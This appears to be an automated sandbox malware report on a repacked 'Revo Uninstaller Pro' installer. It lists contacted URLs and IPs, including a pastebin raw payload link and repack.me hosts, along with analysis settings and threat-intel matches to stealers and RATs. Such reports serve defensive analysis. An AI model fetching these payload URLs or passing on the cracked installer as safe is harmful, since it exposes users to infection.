      https://addons.opera.com/en/extensions/details/dify-cashback/ | setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://www.revouninstallerpro.com/db/ilogs/Uninstaller | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Software | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp | false | | high
      http://schemas.xmlsoap.org/soap/encoding/ | ruplp.exe, 0000000A.00000003.2102817735.0000000002C8A000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://tools.ietf.org/html/rfc1321 | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://www.opera.com0 | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://pastebin.com/raw/vkwZzU9B. | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://opera.com/privacy | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://nsis.sf.net/NSIS_ErrorError | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1750050502.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1970159457.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PACK.EXE, 00000010.00000003.2198109948.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199870901.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2198460363.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199605579.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199929800.0000000000C52000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.symauth.com/cps0( | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://gamemaker.io) | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      https://mail.repack.me/ | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://sourcecode.opera.com | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.animation.arthouse.org | ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/) | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://mail.repack.me/rosoft | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://crl.micro | powershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2323270683.00000000072E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.Licence-Protector.com | ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.symauth.com/rpa00 | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://schemas.xmlsoap.org/wsdl/http/ | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      http://schemas.xmlsoap.org/wsdl/ | ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmp | false | | high
      https://gamemaker.io/en/get. | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://gamemaker.io | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://help.instagram.com/581066165581870; | setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp | false | | high
      https://www.revouninstallerpro.com/db/ilogs/.ruelDelete | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.vsrevogroup.com | Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.ietf.org/rfc/rfc3447.txtSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                              high
                                                                                                              http://www.mirage-systems.de/%operationName%ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://pastebin.com/raw/vkwZzU9BdRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://pastebin.com/raw/vkwZzU9Bget8191Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.opera.com/privacysetup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                    high
                                                                                                                    https://crashpad.chromium.org/bug/newsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.revouninstaller.com/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                        high
                                                                                                                        https://pastebin.com/raw/vkwZzU9BsRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://gamemaker.io/en/education.setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                            high
                                                                                                                            https://legal.opera.com/terms.setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://pastebin.com/raw/vkwZzU9BtRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159553605.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.mirage-systems.de/ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://repacks.ddns.nethttps://repack.me/ad.htmlopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://telegram.org/tos/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                high
                                                                                                                                http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/wsdl/soap/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.borland.com/namespaces/TypesAruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://repack.me/ad.htmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.movable-type.co.uk/scripts/xxtea.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.comsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.borland.com/namespaces/Typesruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.revouninstaller.com/feedback/?product=proRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.borland.com/namespaces/Typesaruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://autoupdate.geo.opera.com/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://twitter.com/en/tos;setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://redir.opera.com/uninstallsurvey/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.aiim.org/pdfa/ns/id/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://repacks.ddns.netopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.borland.com/rootpart.xmlruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://mail.repack.me/tsjtmfdm.pkg2Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/upRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://legal.opera.com/eula/computerssetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://www.itl.nist.gov/fipspubs/fip180-1.htmruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  104.20.3.235
                                                                                                                                                                  pastebin.comUnited States
                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                  107.167.96.36
                                                                                                                                                                  na-download.opera.comUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  194.87.189.43
                                                                                                                                                                  mail.repack.meRussian Federation
                                                                                                                                                                  197695AS-REGRUfalse
                                                                                                                                                                  107.167.96.38
                                                                                                                                                                  na-autoupdate.opera.comUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.96.39
                                                                                                                                                                  unknownUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.96.30
                                                                                                                                                                  trn.lb.opera.technologyUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.125.189
                                                                                                                                                                  submit-trn.osp.opera.softwareUnited States
                                                                                                                                                                  21837OPERASOFTWAREUSfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571786
Start date and time: 2024-12-09 17:51:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Revo.Uninstaller.Pro.v5.3.4.exe
Detection: MAL
Classification: mal44.troj.evad.winEXE@44/128@9/7
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 62.5%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 95%
                                                                                                                                                                  • Number of executed functions: 376
                                                                                                                                                                  • Number of non-executed functions: 130
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.212.252.8, 23.212.252.40, 20.109.210.53, 13.107.246.63
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, e125010.dscd.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, v2.download3.operacdn.com.edgekey.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1260 because it is empty
                                                                                                                                                                  • Execution Graph export aborted for target ruplp.exe, PID 1188 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target setup.exe, PID 2252 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • VT rate limit hit for: Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | cr_asm3.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | cr_asm_atCAD.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | 5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
Match | Associated Sample Name / URL | Detection | Threat Name | Context
submit-trn.osp.opera.software | file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar | 107.167.125.189
submit-trn.osp.opera.software | PDFViewer_46615443.msi | malicious | Unknown | 107.167.125.189
submit-trn.osp.opera.software | SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe | malicious | Glupteba | 107.167.125.189
submit-trn.osp.opera.software | OperaSetup.exe | malicious | Quasar | 107.167.125.189
submit-trn.osp.opera.software | OperaSetup.exe | malicious | Quasar | 107.167.125.189
trn.lb.opera.technology | https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html | malicious | Unknown | 107.167.96.30
trn.lb.opera.technology | file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar | 107.167.96.31
trn.lb.opera.technology | PDFViewer_46615443.msi | malicious | Unknown | 107.167.96.30
pastebin.com | rrats.exe | malicious | AsyncRAT | 172.67.19.24
pastebin.com | Q8o0Mx52Fd.exe | malicious | Unknown | 104.20.3.235
pastebin.com | Q8o0Mx52Fd.exe | malicious | Unknown | 104.20.3.235
pastebin.com | Setup.exe | malicious | LummaC Stealer | 104.20.4.235
pastebin.com | Microsoft.doc | malicious | Unknown | 104.20.3.235
pastebin.com | a9YMw44iQq.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
pastebin.com | nlGOh9K5X5.exe | malicious | Xmrig | 172.67.19.24
pastebin.com | cJ6xbAA5Rn.exe | malicious | Unknown | 172.67.19.24
pastebin.com | vortex.ps1 | malicious | AsyncRAT, PureLog Stealer | 104.20.3.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | SJqOoILabX.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.16.9
CLOUDFLARENETUS | https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54 | malicious | Phisher | 104.17.25.14
CLOUDFLARENETUS | 5EZLEXDveC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.43.156
CLOUDFLARENETUS | 8GHb2yuPOk.exe | malicious | Amadey, LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | Employee_Letter.pdf | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBU | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | W7ZBbzV7A5.exe | malicious | Unknown | 104.26.3.46
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger | 104.21.67.152
AS-REGRU | cXjy5Y6dXX.exe | malicious | RHADAMANTHYS | 193.124.205.63
AS-REGRU | SRT68.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | New Order.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | 72STaC6BmljfbIQ.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | attached invoice.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | specification and drawing.exe | malicious | FormBook, PureLog Stealer | 194.58.112.174
AS-REGRU | Pre Alert PO TVKJEANSA00967.bat.exe | malicious | FormBook, PureLog Stealer | 194.58.112.174
AS-REGRU | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 37.140.192.206
AS-REGRU | Fi#U015f.exe | malicious | FormBook | 31.31.196.177
IOFLOODUS | 06.exe | malicious | AgentTesla | 107.178.108.41
IOFLOODUS | sdfg.exe | malicious | AgentTesla | 107.178.108.41
IOFLOODUS | teste.arm.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 184.164.88.203
IOFLOODUS | https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.html | malicious | Unknown | 107.167.96.30
IOFLOODUS | nabarm.elf | malicious | Unknown | 148.163.47.37
IOFLOODUS | file.exe | malicious | Unknown | 148.163.93.46
IOFLOODUS | file.exe | malicious | MicroClip | 148.163.93.46
IOFLOODUS | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 107.167.84.42
IOFLOODUS | file.exe | malicious | FormBook | 107.167.84.42
Match | Associated Sample Name / URL | Detection | Threat Name
37f463bf4616ecd445d4a1937da06e19 | http://crissertaoericardo.com.br/images/document.pif.rar | malicious | GuLoader
37f463bf4616ecd445d4a1937da06e19 | tQoSuhQIdC.msi | malicious | Unknown
37f463bf4616ecd445d4a1937da06e19 | A8Uynu9lwi.lnk | malicious | Unknown
37f463bf4616ecd445d4a1937da06e19 | MsmxWY8nj7.exe | malicious | RHADAMANTHYS
37f463bf4616ecd445d4a1937da06e19 | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader
37f463bf4616ecd445d4a1937da06e19 | Lenticels.exe | malicious | Snake Keylogger
37f463bf4616ecd445d4a1937da06e19 | Request for Quotation New collaboration.exe | malicious | GuLoader, MassLogger RAT
